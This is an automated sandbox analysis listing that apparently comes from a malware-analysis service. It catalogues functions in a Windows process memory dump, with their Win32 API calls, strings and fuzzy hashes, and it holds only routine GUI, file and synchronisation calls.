Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: File$ByteCharHandleLoadModuleMultiNameStringWideWrite$MessageQueryVirtual
String ID: ,cP$T`P
API String ID: 135118572-1769061119
Opcode ID: e85cd00e3fadecd4307acb4d1cb4f21b86297b3514c68a4c792a88d937c25996
Instruction ID: 471c6785c0ee82aab6a22840cb033e6b5eb0057a38e77fa62ffbaee161725c08
Opcode Fuzzy Hash: e85cd00e3fadecd4307acb4d1cb4f21b86297b3514c68a4c792a88d937c25996
Instruction Fuzzy Hash: 4C316471640204BEEB14EBA5DC42FDA73ACEB05704F50817AB705F61E2DE78AE448B68

Uniqueness

Uniqueness Score: -1.00%

Function 004C004C, Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 283windowCOMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F02), ref: 004C0153
SetCursor.USER32(00000000,00000000,00007F02,00000000,004C01E8), ref: 004C0159
SetCursor.USER32(00000001,004C01D0,00007F02,00000000,004C01E8), ref: 004C01C3
SendMessageW.USER32(00000000,0000113F,00000000,00000001), ref: 004C0349
SendMessageW.USER32(00000000,00001113,00000000,00000000), ref: 004C0373

Strings

, xrefs: 004C03DE
, xrefs: 004C0404
Internal error: Item already expanding, xrefs: 004C00F0

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: Cursor$MessageSend$Load
String ID: $ $Internal error: Item already expanding
API String ID: 2233766430-1948079669
Opcode ID: 7b26d4c5415fee93f42151a4601620a3889ceccad14e668106a61b5b9d3385e5
Instruction ID: 145e3ce23c7c83ab6dbf7d92bb42d6447e1a84e2db4a49e9c1978b7d2d87e34f
Opcode Fuzzy Hash: 7b26d4c5415fee93f42151a4601620a3889ceccad14e668106a61b5b9d3385e5
Instruction Fuzzy Hash: 2BB19F34600244DFDB65DF69C589F9BBBF1AF04304F1484AEE845AB692C778ED40CB58

Uniqueness

Uniqueness Score: -1.00%

Function 004FC5AC, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 145fileCOMMON

Download Yara Rule

APIs

Part of subcall function 004AE0F8: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,?,_iu,?,00000000,004AE233), ref: 004AE1E3
Part of subcall function 004AE0F8: CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,?,_iu,?,00000000,004AE233), ref: 004AE1F3

CopyFileW.KERNEL32(00000000,00000000,00000000,00000000,004FC79A), ref: 004FC62F
SetFileAttributesW.KERNEL32(00000000,00000080,00000000,00000000,00000000,00000000,004FC79A), ref: 004FC656
SetWindowLongW.USER32 ref: 004FC690
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,004FC763,?,?,000000FC,004FBC7C,00000000,00400000,00000000), ref: 004FC6C5
MsgWaitForMultipleObjects.USER32 ref: 004FC739
CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,004FC763,?,?,000000FC,004FBC7C,00000000), ref: 004FC747

Part of subcall function 004AE5E8: WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000), ref: 004AE6CE

DestroyWindow.USER32(?,004FC76A,00000000,00000000,00000000,00000000,00000000,00000097,00000000,004FC763,?,?,000000FC,004FBC7C,00000000,00400000), ref: 004FC75D

Strings

/SECONDPHASE="%s" /FIRSTPHASEWND=$%x , xrefs: 004FC6F4
STATIC, xrefs: 004FC676

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: FileWindow$CloseHandle$AttributesCopyCreateDestroyLongMultipleObjectsPrivateProfileStringWaitWrite
String ID: /SECONDPHASE="%s" /FIRSTPHASEWND=$%x $STATIC
API String ID: 1779715363-2312673372
Opcode ID: 4ae124f605e0e5f59a72906d3bd1c8c46fc3ca59626ee27a71b6d0abc03c3ee3
Instruction ID: 9394d469103984081b8070ca8c9da3098e8e46f8cc4b19dc7d3383a2947fd714
Opcode Fuzzy Hash: 4ae124f605e0e5f59a72906d3bd1c8c46fc3ca59626ee27a71b6d0abc03c3ee3
Instruction Fuzzy Hash: F6418F70A0420DAFDB00EBB5DD82AAE77F8EB49714F11447AF600F7292D7789D048B69

Uniqueness

Uniqueness Score: -1.00%

Function 00461058, Relevance: 15.2, APIs: 10, Instructions: 231windowCOMMON

Download Yara Rule

APIs

RectVisible.GDI32(?,?), ref: 00461170
SaveDC.GDI32(?), ref: 00461193
IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 004611D3
RestoreDC.GDI32(?,00460FF2), ref: 004611FF

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: Rect$ClipIntersectRestoreSaveVisible
String ID:
API String ID: 1976014923-0
Opcode ID: 5bae6500ca95418954d825d7738d8aef3fc79c48208f7b9a0dbf1543cda5ba6d
Instruction ID: 70bf75537bb4c82ba56664f7d13cedc9c30fb57d843eda755662797bc73f88d8
Opcode Fuzzy Hash: 5bae6500ca95418954d825d7738d8aef3fc79c48208f7b9a0dbf1543cda5ba6d
Instruction Fuzzy Hash: 9591DA70A002499FDB04DF99C485FAE7BF5AF08314F1844A6E944EB3A6E779ED80CB54

Uniqueness

Uniqueness Score: -1.00%

Function 004319C0, Relevance: 15.2, APIs: 10, Instructions: 224windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00431F8C: EnterCriticalSection.KERNEL32(0050AF20,00000000,004340D5,00000000,?,?,00435A5E,004364EC,00000000,?,?), ref: 00431F94
Part of subcall function 00431F8C: LeaveCriticalSection.KERNEL32(0050AF20,0050AF20,00000000,004340D5,00000000,?,?,00435A5E,004364EC,00000000,?,?), ref: 00431FA1
Part of subcall function 00431F8C: EnterCriticalSection.KERNEL32(?,0050AF20,0050AF20,00000000,004340D5,00000000,?,?,00435A5E,004364EC,00000000,?,?), ref: 00431FAA

CreateCompatibleDC.GDI32(00000000), ref: 00431A64
SelectObject.GDI32(?,?), ref: 00431A74
StretchBlt.GDI32(?,?,?,?,?,?,?,?,00000000,?,00CC0020), ref: 00431B6E
SetTextColor.GDI32(?,00000000), ref: 00431B7C
SetBkColor.GDI32(?,00FFFFFF), ref: 00431B90
StretchBlt.GDI32(?,?,?,?,?,?,?,?,00000000,?,00E20746), ref: 00431BC3
SetTextColor.GDI32(?,?), ref: 00431BD3
SetBkColor.GDI32(?,?), ref: 00431BE3
SelectObject.GDI32(?,00000000), ref: 00431C13
DeleteDC.GDI32(?), ref: 00431C1C

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: Color$CriticalSection$EnterObjectSelectStretchText$CompatibleCreateDeleteLeave
String ID:
API String ID: 675119849-0
Opcode ID: 8a08fb87f795b743e4a3fb426b2e1ff442c03de0321d93f1b4480fba7d9b12ca
Instruction ID: 55b5369e7ab9b0c3b841e8dead2fdba73e69d290c251e6a16fb1218067166020
Opcode Fuzzy Hash: 8a08fb87f795b743e4a3fb426b2e1ff442c03de0321d93f1b4480fba7d9b12ca
Instruction Fuzzy Hash: 12919475A00548AFCB40DFA9C985E9EBBF8AF0D304F5494AAF548EB361C634ED41CB64

Uniqueness

Uniqueness Score: -1.00%

Function 004613E4, Relevance: 15.2, APIs: 10, Instructions: 197COMMON

Download Yara Rule

APIs

SaveDC.GDI32(?), ref: 00461401

Part of subcall function 004595F0: GetWindowOrgEx.GDI32(?), ref: 004595FE
Part of subcall function 004595F0: SetWindowOrgEx.GDI32(?,?,?,00000000), ref: 00459614

IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 0046143A
GetWindowLongW.USER32(00000000,000000EC), ref: 0046144E
GetWindowLongW.USER32(00000000,000000F0), ref: 0046146F
SetRect.USER32 ref: 004614CF
IntersectClipRect.GDI32(?,00000000,00000000,00000010,?), ref: 0046153F

Part of subcall function 00461338: SaveDC.GDI32(?), ref: 00461348
Part of subcall function 00461338: ExcludeClipRect.GDI32(?,?,?,?,?,00000000,004613CC,?,?), ref: 00461389
Part of subcall function 00461338: RestoreDC.GDI32(?,?), ref: 004613C6

SetRect.USER32 ref: 00461560
DrawEdge.USER32(?,?,00000000,00000000), ref: 0046156F
IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 00461598
RestoreDC.GDI32(?,?), ref: 00461617

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: Rect$ClipWindow$Intersect$LongRestoreSave$DrawEdgeExclude
String ID:
API String ID: 3997055466-0
Opcode ID: 9950d6781ff9d5eff8a3b138a105516a1338cfa7fd7f969085f4e9ccafa65fe7
Instruction ID: a3dab8811c78afcc05711a0e437cf01292ecd1c8eff3016d8288169c54e726f2
Opcode Fuzzy Hash: 9950d6781ff9d5eff8a3b138a105516a1338cfa7fd7f969085f4e9ccafa65fe7
Instruction Fuzzy Hash: E2713C75A00248AFDB10DF99C981F9EB7B8AF48304F144196F901EB3A2D738EE41DB55

Uniqueness

Uniqueness Score: -1.00%

Function 004780A4, Relevance: 15.2, APIs: 10, Instructions: 163windowCOMMON

Download Yara Rule

APIs

GetCapture.USER32 ref: 00478115
GetCapture.USER32 ref: 00478124
SendMessageW.USER32(00000000,0000001F,00000000,00000000), ref: 0047812A
ReleaseCapture.USER32(00000000,004783CE), ref: 0047812F
GetActiveWindow.USER32 ref: 0047814C
IsWindow.USER32(00000000), ref: 00478192
GetActiveWindow.USER32 ref: 0047819B
SendMessageW.USER32(00000000,0000B000,00000000,00000000), ref: 00478231
SendMessageW.USER32(00000000,0000B001,00000000,00000000), ref: 0047829E
GetActiveWindow.USER32 ref: 004782AD

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$ActiveCaptureMessageSend$Release
String ID:
API String ID: 3054343883-0
Opcode ID: b82846c526e0609d84a9937e2838c6ff4239eb1d61cabdeb27f4b564b6435126
Instruction ID: 1011f0d6a0b22324e5b38a8d1e40496526cded5341397e34e6f9d31782d1d69e
Opcode Fuzzy Hash: b82846c526e0609d84a9937e2838c6ff4239eb1d61cabdeb27f4b564b6435126
Instruction Fuzzy Hash: 1A615270A40248DFEB10EF69C989B9E77F5FF45704F5484AAF404AB2A2DB789D04DB48

Uniqueness

Uniqueness Score: -1.00%

Function 00438250, Relevance: 15.1, APIs: 10, Instructions: 89synchronizationthreadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00438260
CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00438281
InterlockedExchangeAdd.KERNEL32(?,?), ref: 004382B5
LeaveCriticalSection.KERNEL32(?,00000000,00438331,?,00000000,00000000,00000000,00000000), ref: 004382BB
WaitForSingleObject.KERNEL32(?,?,?,00000000,00438331,?,00000000,00000000,00000000,00000000), ref: 004382C8
SetLastError.KERNEL32(000005B4,?,?,?,00000000,00438331,?,00000000,00000000,00000000,00000000), ref: 004382E2
SetLastError.KERNEL32(00000000,?,?,?,00000000,00438331,?,00000000,00000000,00000000,00000000), ref: 004382F5
EnterCriticalSection.KERNEL32(?,?,?,?,00000000,00438331,?,00000000,00000000,00000000,00000000), ref: 004382FB
InterlockedExchangeAdd.KERNEL32(?,?), ref: 00438312
CloseHandle.KERNEL32(?,0043833C,?,?,?,00000000,00438331,?,00000000,00000000,00000000,00000000), ref: 0043832B

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalErrorExchangeInterlockedLastSection$CloseCreateCurrentEnterEventHandleLeaveObjectSingleThreadWait
String ID:
API String ID: 3135347424-0
Opcode ID: 30959f633fa3d65b060d4475103d2109e7f327a50115591e10efc2e38d384939
Instruction ID: fb9ba88145ea954a72c7c5af2f89dabbe07526b79f7e1da62e59565462d38d92
Opcode Fuzzy Hash: 30959f633fa3d65b060d4475103d2109e7f327a50115591e10efc2e38d384939
Instruction Fuzzy Hash: 30219871604304AADB11DFA58C41B9EB7A8DB09704F1484ABF904EB283DA7D9D018769

Uniqueness

Uniqueness Score: -1.00%

Function 0047697C, Relevance: 15.1, APIs: 10, Instructions: 74windowCOMMON

Download Yara Rule

APIs

GetSystemMenu.USER32(00000000,00000000), ref: 004769C7
DeleteMenu.USER32(00000000,0000F130,00000000,00000000,00000000), ref: 004769E5
DeleteMenu.USER32(00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 004769F2
DeleteMenu.USER32(00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 004769FF
DeleteMenu.USER32(00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00476A0C
DeleteMenu.USER32(00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000), ref: 00476A19
DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000), ref: 00476A26
DeleteMenu.USER32(00000000,0000F120,00000000,00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000), ref: 00476A33
EnableMenuItem.USER32 ref: 00476A51
EnableMenuItem.USER32 ref: 00476A6D

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: Menu$Delete$EnableItem$System
String ID:
API String ID: 3985193851-0
Opcode ID: a1d30e067c49b3b3c213278b205c02e8b56284789c34e07f7c99cda3d534d6d0
Instruction ID: 3e74fcead3795c671015783c1ea3a2708ce59c5f7749655310bb817073437509
Opcode Fuzzy Hash: a1d30e067c49b3b3c213278b205c02e8b56284789c34e07f7c99cda3d534d6d0
Instruction Fuzzy Hash: F0213D703857007AE760EA25CC8EF997AE9AB05718F05C4A5B6487F6E3D6B8A9409708

Uniqueness

Uniqueness Score: -1.00%

Function 0042A928, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 119synchronizationthreadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0042A935
CreateEventW.KERNEL32(00000000,000000FF,00000000,00000000), ref: 0042A9A7
EnterCriticalSection.KERNEL32(0050AE80,00000000,0042AAC5), ref: 0042A9CF
LeaveCriticalSection.KERNEL32(0050AE80,00000000,0042AA9E,?,0050AE80,00000000,0042AAC5), ref: 0042AA46
WaitForSingleObject.KERNEL32(?,000000FF,00000000,0042AA7F,?,0050AE80,00000000,0042AA9E,?,0050AE80,00000000,0042AAC5), ref: 0042AA62
EnterCriticalSection.KERNEL32(0050AE80,0042AA86,0042AA7F,?,0050AE80,00000000,0042AA9E,?,0050AE80,00000000,0042AAC5), ref: 0042AA79

Strings

<`P, xrefs: 0042A93A

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$Enter$CreateCurrentEventLeaveObjectSingleThreadWait
String ID: <`P
API String ID: 1504017990-3701931957
Opcode ID: a0a868ddf7b571b4cfe4ed518fc0739341e7f410b2c26d0775e730190c8cbfbf
Instruction ID: 17154e124857e5c90f5ddf3bfa5372f0e28820bbf0dea9b126f489a5461829d8
Opcode Fuzzy Hash: a0a868ddf7b571b4cfe4ed518fc0739341e7f410b2c26d0775e730190c8cbfbf
Instruction Fuzzy Hash: 0B41EF30B04200EFD711DFA5D941A6DBBF5EF49300FA584A6EC04A73A2C3799D54DB2A

Uniqueness

Uniqueness Score: -1.00%

Function 004117AB, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 106filewindowCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(00000001,00000000,?,00000000,00000000,00000000,00000000,00000000,00000400,00000000,004118DD), ref: 00411819
WideCharToMultiByte.KERNEL32(00000001,00000000,?,00000000,?,00000000,00000000,00000000), ref: 0041184C
GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000,?,00000000,00000000,00000000), ref: 0041185E
WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000,?,00000000,00000000,00000000), ref: 00411864
GetStdHandle.KERNEL32(000000F4,004118F8,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000,?), ref: 00411878
WriteFile.KERNEL32(00000000,000000F4,004118F8,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000), ref: 0041187E

Part of subcall function 004115CC: VirtualQuery.KERNEL32(?,?,0000001C,00000000,00411778), ref: 004115FF
Part of subcall function 004115CC: GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 00411623
Part of subcall function 004115CC: GetModuleFileNameW.KERNEL32(00400000,?,00000105), ref: 0041163E
Part of subcall function 004115CC: LoadStringW.USER32(00000000,0000FFE8,?,00000100), ref: 004116D9

LoadStringW.USER32(00000000,0000FFE9,?,00000040), ref: 004118A2
MessageBoxW.USER32(00000000,?,?,00002010), ref: 004118BC

Strings

T`P, xrefs: 004117E8
,cP, xrefs: 004117F6

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: File$ByteCharHandleLoadModuleMultiNameStringWideWrite$MessageQueryVirtual
String ID: ,cP$T`P
API String ID: 135118572-1769061119
Opcode ID: 192d9b84e4e1c560c071b9f984160ff9d467d1e060e68caa646db112b756fe76
Instruction ID: 99ed3e4f1dfbc93ec13ff07f74980a17bc0422ba3d8aee3020c219fc696f952b
Opcode Fuzzy Hash: 192d9b84e4e1c560c071b9f984160ff9d467d1e060e68caa646db112b756fe76
Instruction Fuzzy Hash: A931C671640204BFEB14EB61DC42FE977ACEB45714F60417AB601A62E2DA786E448A6C

Uniqueness

Uniqueness Score: -1.00%

Function 004B1A74, Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 90COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(OLEAUT32.DLL,UnRegisterTypeLib,00000000,004B1B8E,?,?,?,00000000,00000000,00000000,00000000,00000000,?,004B6989,00000000,004B699D), ref: 004B1A9A

Part of subcall function 00409620: GetProcAddress.KERNEL32(?,?), ref: 00409644

LoadTypeLib.OLEAUT32(00000000,00000000), ref: 004B1ADE

Part of subcall function 004ADC34: GetLastError.KERNEL32(00000000,004AE8EE,00000005,00000000,004AE916,?,?,00000000,0050B17C,00000000,00000000,00000000,?,004FE26B,00000000,004FE286), ref: 004ADC37

Strings

LoadTypeLib, xrefs: 004B1AE9
GetProcAddress, xrefs: 004B1AAD
UnRegisterTypeLib, xrefs: 004B1B3C
UnRegisterTypeLib, xrefs: 004B1A90
ITypeLib::GetLibAttr, xrefs: 004B1B06
OLEAUT32.DLL, xrefs: 004B1A95

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressErrorHandleLastLoadModuleProcType
String ID: GetProcAddress$ITypeLib::GetLibAttr$LoadTypeLib$OLEAUT32.DLL$UnRegisterTypeLib$UnRegisterTypeLib
API String ID: 1914119943-2711329623
Opcode ID: d7b15ebabe7a39319ed6deef3d8ceb5cc2e333aa4e658892d93ab267dd6d7464
Instruction ID: 191c21c4325eb05eb286a33cca918340d22c846504a666f5b8da60ef90ebdb10
Opcode Fuzzy Hash: d7b15ebabe7a39319ed6deef3d8ceb5cc2e333aa4e658892d93ab267dd6d7464
Instruction Fuzzy Hash: 11219171A04104AFDB04EBAACC52DABB7FDEF89700391846AB400D7261EA78ED01C778

Uniqueness

Uniqueness Score: -1.00%

